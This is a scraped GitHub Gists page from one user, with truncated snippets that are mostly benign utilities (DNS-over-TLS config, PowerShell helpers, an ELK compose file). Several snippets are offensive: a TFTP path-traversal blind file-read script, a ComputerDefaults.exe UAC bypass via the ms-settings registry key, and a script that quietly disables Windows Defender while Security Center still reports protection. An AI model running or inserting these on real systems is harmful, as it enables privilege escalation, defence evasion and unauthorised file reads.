I recommend this only be done on homelab/segmented hardware. This will make your host vulnerable to these exploits.
Depending on your CPU generation, you can regain 20-30% performance.
Nate Subra natesubra
natesubra
/ tftp_blindread_windows.sh
Last active
May 22, 2020 23:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| _FILES=($(curl -s https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt | tr '[:upper:]' '[:lower:]' | sed -e 's/c:/..\/..\/..\/..\/..\/../g')) | |
| for f in "${_FILES[@]}"; do | |
| echo "Testing ${f}" | |
| tftp "$1" << EOF | |
| get "${f}" | |
| quit | |
| EOF |
natesubra
/ kresd-config.lua
Created
June 3, 2020 01:59
— forked from catap/kresd-config.lua
An example configuration to random selection between Quad9, Cloudflare and Google DNS-over-TLS for knot-resolver (kresd)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'math' | |
| math.randomseed(os.time()) | |
| dns_providers = { | |
| { -- Quad9 | |
| {'9.9.9.9', hostname='dns.quad9.net', ca_file='/usr/local/etc/kresd/DigiCertECCSecureServerCA.pem'}, | |
| {'149.112.112.112', hostname='dns.quad9.net', ca_file='/usr/local/etc/kresd/DigiCertECCSecureServerCA.pem'} | |
| }, | |
| { -- Cloudflare | |
| {'1.1.1.1', hostname='cloudflare-dns.com', ca_file='/usr/local/etc/kresd/DigiCertECCSecureServerCA.pem'}, |
natesubra
/ ShowObjectGraph.ps1
Created
January 3, 2021 07:04
— forked from sean-m/ShowObjectGraph.ps1
Displays structure of an object/collection in a WPF TreeView. (updated for pwsh7)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Show-ObjectGraph { | |
| [Alias('sog')] | |
| <# | |
| .Synopsis | |
| Displays structure of an object/collection in a WPF TreeView. | |
| .DESCRIPTION | |
| Recursively builds out an object graph which is then set to | |
| the DataContext of a WPF TreeView. This will display all type and | |
| member info for the object or collection elements. This is a blocking | |
| operation. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First run: | |
| # mkdir -p ./data/elasticsearch_data ./data/logstash_config && sudo chown -R 1000:1000 ./data | |
| services: | |
| # https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html | |
| elasticsearch: | |
| image: docker.elastic.co/elasticsearch/elasticsearch:7.14.0 | |
| container_name: elasticsearch | |
| environment: |
natesubra
/ disable_mitigations.md
Last active
December 29, 2025 15:44
ESXI Homelab Disable Spectre/Meltdown/SSBD
natesubra
/ UAC-Bypass_ComputerDefaults.ps1
Created
October 11, 2021 23:52
ComputerDefaults.exe UAC Bypass Snippet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param ( | |
| [Parameter(Mandatory = $True)] | |
| [ScriptBlock]$ScriptBlock | |
| ) | |
| if ([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -match 'S-1-5-32-544') { | |
| Write-Host 'Already Elevated' | |
| } else { | |
| $RegPath = 'HKCU:\software\classes\ms-settings\shell\open\command' | |
| New-Item $RegPath -Force | |
| New-ItemProperty $RegPath -Name 'DelegateExecute' -Value $null -Force |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $tableLayout = ( | |
| @{Expression = { ((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value }; Label = "Name"; Width = 40 }, | |
| @{Expression = { $_.Value }; Label = "SID"; Width = 40 }, | |
| @{Expression = { $_.Type }; Label = "Type" } | |
| ) | |
| $Claims = ([Security.Principal.WindowsIdentity]::GetCurrent()).Claims | |
| $Claims | Format-Table $tableLayout |
natesubra
/ output.txt
Created
November 12, 2021 22:12
— forked from jpoehls/output.txt
PowerShell benchmarking function. Or, the Windows equivalent of Unix's `time` command.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS> time { ping -n 1 google.com } -Samples 10 -Silent | |
| .......... | |
| Avg: 62.1674ms | |
| Min: 56.9945ms | |
| Max: 87.9602ms | |
| PS> time { ping -n 1 google.com } -Samples 10 -Silent -Long | |
| .......... | |
| Avg: 00:00:00.0612480 | |
| Min: 00:00:00.0572167 |
natesubra
/ get-scoopapps.ps1
Created
March 17, 2022 17:36
Generate HTML Index of all Installed Scoop buckets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try { | |
| Import-Module PSWriteHTML -ErrorAction Break | |
| } | |
| catch { | |
| Install-Module -Name PSWriteHTML -Scope CurrentUser | |
| } | |
| $SCOOP_BUCKETS_DIR = (Get-ChildItem $ENV:SCOOP\Buckets) | |
| $SCOOP_MANIFESTS = [System.Collections.Generic.List[object]]::new() |
natesubra
/ Disable-Defender.ps1
Last active
September 16, 2025 19:10
Disable Windows Defender (Nicely)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -RunAsAdministrator | |
| # "Disables" Defender by adding exclusions and turning off advanced bits. Run this under an elevated powershell prompt | |
| # Defender will be essentially gutted/disabled without messing with any files/underlying services. Windows Security center will still display that AV is working etc. | |
| $driveletters = [char]'a'..[char]'z' | |
| # Ref https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference | |
| # Useful: https://github.com/dgoldman-msft/Get-MpPreferences/blob/main/Get-MpPreferences.ps1 | |
| $paramHash = @{ |